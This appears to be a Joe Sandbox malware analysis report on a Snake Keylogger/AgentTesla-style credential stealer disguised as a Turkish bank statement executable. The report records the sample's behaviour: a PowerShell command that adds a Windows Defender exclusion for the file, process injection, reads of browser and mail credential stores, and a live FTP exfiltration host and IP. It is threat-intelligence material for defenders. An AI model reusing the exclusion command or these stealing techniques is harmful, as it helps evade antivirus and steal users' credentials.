                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608940593.0000000001148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeMemory written: C:\Users\user\Desktop\hesaphareketi__20241001.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Users\user\Desktop\hesaphareketi__20241001.exe VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: hesaphareketi__20241001.exe PID: 2360, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\FTP Navigator\Ftplist.txt
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000005.00000002.4610095898.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: hesaphareketi__20241001.exe PID: 2360, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: hesaphareketi__20241001.exe PID: 5732, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: hesaphareketi__20241001.exe PID: 2360, type: MEMORYSTR
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                  Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                  Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 111 Process Injection
                  Credential Access: 2 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                  Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                  Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 21 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                  Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                  Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                  Source | Detection | Scanner | Label
                  hesaphareketi__20241001.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeLogger
                  hesaphareketi__20241001.exe | 28% | Virustotal |
                  hesaphareketi__20241001.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  ftp.normagroup.com.tr | 12% | Virustotal |
                  Source | Detection | Scanner | Label
                  https://account.dyn.com/ | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                  http://ftp.normagroup.com.tr | 12% | Virustotal |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  ftp.normagroup.com.tr | 104.247.165.99 | true | true | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://ftp.normagroup.com.tr | hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000003014000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002E47000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                  https://account.dyn.com/ | hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hesaphareketi__20241001.exe, 00000000.00000002.2149506599.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  104.247.165.99 | ftp.normagroup.com.tr | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1524784
                  Start date and time:2024-10-03 09:10:13 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:hesaphareketi__20241001.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/6@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 186
                  • Number of non-executed functions: 38
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  Time | Type | Description
                  03:11:14 | API Interceptor | 10879078x Sleep call for process: hesaphareketi__20241001.exe modified
                  03:11:16 | API Interceptor | 19x Sleep call for process: powershell.exe modified
                  Match | Associated Sample Name / URL | Detection | Threat Name
                  104.247.165.99 | EUR Swift Bildirimi12-08-2024.exe | malicious | AgentTesla
                  104.247.165.99 | LisectAVT_2403002A_134.exe | malicious | AgentTesla
                  104.247.165.99 | hesaphareketi_____.exe | malicious | AgentTesla
                  104.247.165.99 | hesaphareketi__.exe | malicious | AgentTesla
                  104.247.165.99 | hesaphareketi-.exe | malicious | AgentTesla
                  104.247.165.99 | hesaphareketi-.exe | malicious | AgentTesla
                  104.247.165.99 | hesaphareketi-01-pdf.exe | malicious | AgentTesla
                  104.247.165.99 | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla
                  104.247.165.99 | CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe | malicious | AgentTesla
                  104.247.165.99 | hesaphareketi-14-06-2024.exe | malicious | AgentTesla
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  ftp.normagroup.com.tr | EUR Swift Bildirimi12-08-2024.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | LisectAVT_2403002A_134.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | hesaphareketi_____.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | hesaphareketi__.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe | malicious | AgentTesla | 104.247.165.99
                  ftp.normagroup.com.tr | hesaphareketi-14-06-2024.exe | malicious | AgentTesla | 104.247.165.99
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  ASN-QUADRANET-GLOBALUS | novo.ppc440fp.elf | malicious | Mirai, Moobot | 185.121.176.226
                  ASN-QUADRANET-GLOBALUS | Quote List.scr.exe | malicious | XenoRAT | 66.63.168.142
                  ASN-QUADRANET-GLOBALUS | 58ADE05412907F657812BDA267C43288EA79418091.doc | malicious | Snake Keylogger, VIP Keylogger | 66.63.187.123
                  ASN-QUADRANET-GLOBALUS | New Order.doc | malicious | Snake Keylogger | 66.63.187.123
                  ASN-QUADRANET-GLOBALUS | http://telegram.beethovenstore.com/ | malicious | Unknown | 104.247.162.201
                  ASN-QUADRANET-GLOBALUS | https://83153.cc/ | malicious | Unknown | 27.0.235.36
                  ASN-QUADRANET-GLOBALUS | 0225139776.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 66.63.187.123
                  ASN-QUADRANET-GLOBALUS | http://bet938r.com/ | malicious | Unknown | 27.0.235.160
                  ASN-QUADRANET-GLOBALUS | https://bet958v.com/ | malicious | Unknown | 27.0.235.160
                  ASN-QUADRANET-GLOBALUS | Faktura 5643734_10.doc | malicious | Unknown | 66.63.187.123
                  No context
                                      Process:C:\Users\user\Desktop\hesaphareketi__20241001.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2232
                                      Entropy (8bit):5.380805901110357
                                      Encrypted:false
                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
                                      MD5:C961E3496AA47D8AF3F9E184D4F78133
                                      SHA1:0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
                                      SHA-256:303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
                                      SHA-512:C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.720512829688984
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:hesaphareketi__20241001.exe
                                      File size:716'800 bytes
                                      MD5:5eaafeca7053687b46ecffad93c82418
                                      SHA1:457566502545fecd8ea9f2249b755135cd03b69b
                                      SHA256:27ff307b514230b2363e2284e1d57df50bc8a59b5cf8c732dc32d5587d472c64
                                      SHA512:2f05d5e83132e75aa92b629c5ea8147be87ab7818a08d847ffbd4d688f86fcf68b50ebbe9796952140f3fcb0b31f1726b51e4a6cb1aada2b2d59da1cd74482e1
                                      SSDEEP:12288:jeKw3uC2FoKHj3920VH89VuXdJlAVPQTiOR76+yt8j6KGtm2fv6msi:xw/cVHbQ0V1VcPQebbG6IwCK
                                      TLSH:E4E4D0D03F26731ACE699934C529DEB482B51D69B010BAF36DDD3B87799C102AE0CF46
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.................0.............:.... ... ....@.. .......................`............@................................
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x4b033a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xF298BC3E [Mon Dec 22 14:12:14 2098 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb02e8 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x60c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xaefd0 | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
